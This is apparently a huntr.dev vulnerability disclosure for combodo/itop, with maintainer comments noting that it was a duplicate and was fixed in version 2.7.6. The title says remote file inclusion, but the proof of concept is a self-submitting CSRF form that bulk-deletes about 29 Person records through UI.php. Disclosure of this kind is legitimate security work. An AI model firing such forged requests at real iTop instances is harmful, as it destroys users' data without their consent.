We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

PHP Remote File Inclusion in combodo/itop

Valid

Reported on

Nov 24th 2021

Description

csrf bug

Proof of Concept

Bellow request is vulnerable to csrf attack

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8008/web/pages/UI.php" method="POST">
<input type="hidden" name="transaction&#95;id" value="adm238C&#46;tmp" />
<input type="hidden" name="operation" value="bulk&#95;delete&#95;confirmed" />
<input type="hidden" name="filter" value="&#37;5B&#37;22SELECT&#43;&#37;60Person&#37;60&#43;FROM&#43;Person&#43;AS&#43;&#37;60Person&#37;60&#43;WHERE&#43;&#37;28&#37;60Person&#37;60&#46;&#37;60id&#37;60&#43;IN&#43;&#37;28&#37;2715&#37;27&#37;2C&#43;&#37;2712&#37;27&#37;2C&#43;&#37;2716&#37;27&#37;2C&#43;&#37;2717&#37;27&#37;2C&#43;&#37;276&#37;27&#37;2C&#43;&#37;2722&#37;27&#37;2C&#43;&#37;275&#37;27&#37;2C&#43;&#37;2724&#37;27&#37;2C&#43;&#37;278&#37;27&#37;2C&#43;&#37;2723&#37;27&#37;2C&#43;&#37;2727&#37;27&#37;2C&#43;&#37;2710&#37;27&#37;2C&#43;&#37;2711&#37;27&#37;2C&#43;&#37;2726&#37;27&#37;2C&#43;&#37;274&#37;27&#37;2C&#43;&#37;2714&#37;27&#37;2C&#43;&#37;279&#37;27&#37;2C&#43;&#37;2713&#37;27&#37;2C&#43;&#37;2728&#37;27&#37;2C&#43;&#37;271&#37;27&#37;2C&#43;&#37;272&#37;27&#37;2C&#43;&#37;2718&#37;27&#37;2C&#43;&#37;2729&#37;27&#37;2C&#43;&#37;273&#37;27&#37;2C&#43;&#37;2721&#37;27&#37;2C&#43;&#37;2719&#37;27&#37;2C&#43;&#37;2720&#37;27&#37;2C&#43;&#37;277&#37;27&#37;2C&#43;&#37;2725&#37;27&#37;29&#37;29&#37;22&#37;2C&#37;5B&#37;5D&#37;2C&#37;5B&#37;5D&#37;5D" />
<input type="hidden" name="class" value="Person" />
<input type="hidden" name="selectObject&#91;&#93;" value="15" />
<input type="hidden" name="selectObject&#91;&#93;" value="12" />
<input type="hidden" name="selectObject&#91;&#93;" value="16" />
<input type="hidden" name="selectObject&#91;&#93;" value="17" />
<input type="hidden" name="selectObject&#91;&#93;" value="6" />
<input type="hidden" name="selectObject&#91;&#93;" value="22" />
<input type="hidden" name="selectObject&#91;&#93;" value="5" />
<input type="hidden" name="selectObject&#91;&#93;" value="24" />
<input type="hidden" name="selectObject&#91;&#93;" value="8" />
<input type="hidden" name="selectObject&#91;&#93;" value="23" />
<input type="hidden" name="selectObject&#91;&#93;" value="27" />
<input type="hidden" name="selectObject&#91;&#93;" value="10" />
<input type="hidden" name="selectObject&#91;&#93;" value="11" />
<input type="hidden" name="selectObject&#91;&#93;" value="26" />
<input type="hidden" name="selectObject&#91;&#93;" value="4" />
<input type="hidden" name="selectObject&#91;&#93;" value="14" />
<input type="hidden" name="selectObject&#91;&#93;" value="9" />
<input type="hidden" name="selectObject&#91;&#93;" value="13" />
<input type="hidden" name="selectObject&#91;&#93;" value="28" />
<input type="hidden" name="selectObject&#91;&#93;" value="1" />
<input type="hidden" name="selectObject&#91;&#93;" value="2" />
<input type="hidden" name="selectObject&#91;&#93;" value="18" />
<input type="hidden" name="selectObject&#91;&#93;" value="29" />
<input type="hidden" name="selectObject&#91;&#93;" value="3" />
<input type="hidden" name="selectObject&#91;&#93;" value="21" />
<input type="hidden" name="selectObject&#91;&#93;" value="19" />
<input type="hidden" name="selectObject&#91;&#93;" value="20" />
<input type="hidden" name="selectObject&#91;&#93;" value="7" />
<input type="hidden" name="selectObject&#91;&#93;" value="25" />
<input type="hidden" name="c&#91;menu&#93;" value="Contact" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
We are processing your report and will contact the combodo/itop team within 24 hours. 2 years ago
ranjit-git modified the report
2 years ago
combodo/itop maintainer validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pierre Goiffon
3 months ago

Maintainer

This is a duplicate of https://huntr.dev/bounties/0a39630d-f4b9-4468-86d8-aea3b02f91ae/?token=4d1195d5a50a9f0f7ae9fc24a2b0a3bd907427edaf7ee6ac1f8f31c11d8b7a5d2c204957125e63fd7cf3a87df6d5d12a35f9c7107ba5f33b5f668fa199a36932448b9bf186daa62cb32b5635770730eb68eeeba079b8864ab00358fd0dc65fa406d986525814a14951db2025e117f0098a1f270f5a5b2c935a65b00b5106e5511b61d501c4357654cb8ea76b

Was fixed in 2.7.6 / N°4289 Corresponding GitHub advisory : https://github.com/Combodo/iTop/security/advisories/GHSA-33pr-5776-9jqf

Pierre Goiffon marked this as fixed in 2.7.6 with commit 7757f1 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Pierre Goiffon published this vulnerability 3 months ago
to join this conversation